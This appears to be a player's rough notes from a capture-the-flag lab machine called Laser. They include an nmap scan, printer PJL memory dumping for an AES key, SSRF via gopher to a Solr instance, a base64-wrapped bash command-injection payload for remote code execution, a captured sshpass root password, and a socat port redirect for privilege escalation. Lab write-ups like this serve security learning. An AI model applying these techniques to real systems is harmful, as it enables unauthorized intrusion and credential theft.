Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-09 09:23 EDT
Nmap scan report for laser.htb (10.10.10.201)
Host is up (0.057s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
9000/tcp open  cslistener?
9100/tcp open  jetdirect?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9000-TCP:V=7.80%I=7%D=8/9%Time=5F2FF90F%P=x86_64-pc-linux-gnu%r(NUL
SF:L,3F,"\0\0\x18\x04\0\0\0\0\0\0\x04\0@\0\0\0\x05\0@\0\0\0\x06\0\0\x20\0\
SF:xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\x01\0\0\x08\x06\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0")%r(GenericLines,3F,"\0\0\x18\x04\0\0\0\0\0\0\x04\0@\0
SF:\0\0\x05\0@\0\0\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0
SF:\0\?\0\x01\0\0\x08\x06\0\0\0\0\0\0\0\0\0\0\0\0\0")%r(GetRequest,3F,"\0\
SF:0\x18\x04\0\0\0\0\0\0\x04\0@\0\0\0\x05\0@\0\0\0\x06\0\0\x20\0\xfe\x03\0
SF:\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\x01\0\0\x08\x06\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0")%r(HTTPOptions,3F,"\0\0\x18\x04\0\0\0\0\0\0\x04\0@\0\0\0\x05\0
SF:@\0\0\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\x01
SF:\0\0\x08\x06\0\0\0\0\0\0\0\0\0\0\0\0\0")%r(RTSPRequest,3F,"\0\0\x18\x04
SF:\0\0\0\0\0\0\x04\0@\0\0\0\x05\0@\0\0\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\
SF:0\0\x04\x08\0\0\0\0\0\0\?\0\x01\0\0\x08\x06\0\0\0\0\0\0\0\0\0\0\0\0\0")
SF:%r(RPCCheck,3F,"\0\0\x18\x04\0\0\0\0\0\0\x04\0@\0\0\0\x05\0@\0\0\0\x06\
SF:0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\x01\0\0\x08\x06
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0")%r(DNSVersionBindReqTCP,3F,"\0\0\x18\x04\0\
SF:0\0\0\0\0\x04\0@\0\0\0\x05\0@\0\0\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0
SF:\x04\x08\0\0\0\0\0\0\?\0\x01\0\0\x08\x06\0\0\0\0\0\0\0\0\0\0\0\0\0")%r(
SF:DNSStatusRequestTCP,3F,"\0\0\x18\x04\0\0\0\0\0\0\x04\0@\0\0\0\x05\0@\0\
SF:0\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\x01\0\0
SF:\x08\x06\0\0\0\0\0\0\0\0\0\0\0\0\0")%r(Help,3F,"\0\0\x18\x04\0\0\0\0\0\
SF:0\x04\0@\0\0\0\x05\0@\0\0\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08
SF:\0\0\0\0\0\0\?\0\x01\0\0\x08\x06\0\0\0\0\0\0\0\0\0\0\0\0\0")%r(SSLSessi
SF:onReq,3F,"\0\0\x18\x04\0\0\0\0\0\0\x04\0@\0\0\0\x05\0@\0\0\0\x06\0\0\x2
SF:0\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\x01\0\0\x08\x06\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0")%r(TerminalServerCookie,3F,"\0\0\x18\x04\0\0\0\0\
SF:0\0\x04\0@\0\0\0\x05\0@\0\0\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x
SF:08\0\0\0\0\0\0\?\0\x01\0\0\x08\x06\0\0\0\0\0\0\0\0\0\0\0\0\0")%r(TLSSes
SF:sionReq,3F,"\0\0\x18\x04\0\0\0\0\0\0\x04\0@\0\0\0\x05\0@\0\0\0\x06\0\0\
SF:x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\x01\0\0\x08\x06\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.86 seconds

################################################################################
FOOTHOLD
################################################################################
22/tcp   open  ssh         OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)

9000/tcp open  cslistener?
9100/tcp open  jetdirect?
9000/tcp open  cslistener?:

http to 9100...:
  returns 8 '?'

nc -vv laser.htb 9000 > p9000

X - 9100 printer exploits?:
  X - use exploit/linux/misc/hp_jetdirect_path_traversal

- interact with 9100 with post script....
  - telnet: returns '?'
  - over http: also returns '?'
  - use pret.py with pjl
      @PJL INFO ID
      LaserCorp LaserJet 4ML
      LaserCorp LaserJet 4ML
      LPARM:ENCRYPTION MODE=AES [CBC]  
    - nvram dump gives you a key (nvram/10.10.10.201)
      - k...e....y.....13vu94r6..643rv19u    
        - http://hacking-printers.net/wiki/index.php/Memory_access
    - AES and the key is 16 bytes... so assume https://stackoverflow.com/questions/41951715/aes-java-encryption-16-byte-key-decryption-with-objective-c
      - santize queued (strip b' and ' and ^M^M
      - base64 -d queued > target
      - first 8 is pack trash
      - first 16 is iv
O - port 9000 is rpc feed, read trash.pdf
  - proto to interact
  - python3 -m grpc_tools.protoc -I ./proto --python_out=. --grpc_python_out=. ./proto/s.proto;p3 client1.py
  -client.py + s.proto to call method and ssrf for a port
    X - can call server to get feed.json
    - 8983 found... what does it do?
    0 - guess: https://www.exploit-db.com/exploits/47572
      - activate the core: client1.py
        - guess... staging core? feed engine?
        - must be done with a post request... gopher can emulate this
      - feed payload: client2.py
        - https://lucene.apache.org/solr/guide/8_2/cluster-node-management.html
          - 127.0.1.1:8983_solr
          - use gopher to emulate a post request:
            - https://programming.vip/docs/ssrf-uses-gopher-to-attack-mysql-and-intranet.html
            - I get RCE... but only for nc <IP> <PORT>... i cant do anything else...
            - bash$ client2.py;client3.py
            - "no real feedback, more just a way to ensure that it gets translated across.  I could do simple, whoami just fine, but anything more complicated and it messed up.  So I base64 encoded it, but then also came across + in the base64 so I had to adjust for that"
            O - cmd = 'bash -c {echo,' + base64.b64encode(command.encode('utf-8')).decode('utf-8') + '}|{base64,-d}|{bash,-i}'
            O - cmd = cmd.replace('+', '%2b')
              - NO SHIT.... '+' in a base 64 encoded payload will be interpreted as spaces if URL
              - base 64 your payload and it works
################################################################################
ROOT
################################################################################
O - pspy64s
  O - sshpass -p c413d115b3d87664499624e7826d8c5a scp /opt/updates/files/bug-feed root@172.18.0.2:/root/feeds/ 
    O - sshpass -p c413d115b3d87664499624e7826d8c5a ssh root@172.18.0.2
     X - there is an test rsa key at /tmp and it works? no

2020/09/05 18:37:01 CMD: UID=0    PID=81031  | scp /root/clear.sh root@172.18.0.2:/tmp/clear.sh 
2020/09/05 18:37:01 CMD: UID=0    PID=81030  | /bin/sh -c rm /opt/printer/logs/*.log 
2020/09/05 18:37:01 CMD: UID=0    PID=81029  | sshpass -p zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz scp /root/clear.sh root@172.18.0.2:/tmp/clear.sh 
2020/09/05 18:37:01 CMD: UID=0    PID=81032  | /usr/bin/ssh -x -oForwardAgent=no -oPermitLocalCommand=no -oClearAllForwardings=yes -oRemoteCommand=none -oRequestTTY=no -l root -- 172.18.0.2 scp -t /tmp/clear.sh 
2020/09/05 18:37:01 CMD: UID=0    PID=81033  | /usr/sbin/sshd -R 
2020/09/05 18:37:01 CMD: UID=105  PID=81034  | sshd: [net]       
2020/09/05 18:37:01 CMD: UID=0    PID=81049  | sshpass -p zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz ssh root@172.18.0.2 /tmp/clear.sh 
2020/09/05 18:37:01 CMD: UID=0    PID=81050  | ssh root@172.18.0.2 /tmp/clear.sh 
2020/09/05 18:37:01 CMD: UID=0    PID=81051  | sshd: root [priv] 
2020/09/05 18:37:01 CMD: UID=0    PID=81068  | ssh root@172.18.0.2 rm /tmp/clear.sh 
2020/09/05 18:37:01 CMD: UID=0    PID=81067  | sshpass -p zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz ssh root@172.18.0.2 rm /tmp/clear.sh 

     O - socat https://medium.com/@copyconstruct/socat-29453e9fc8a6
          ./socat TCP-LISTEN:22,fork,reuseaddr TCP:172.18.0.1:22
        


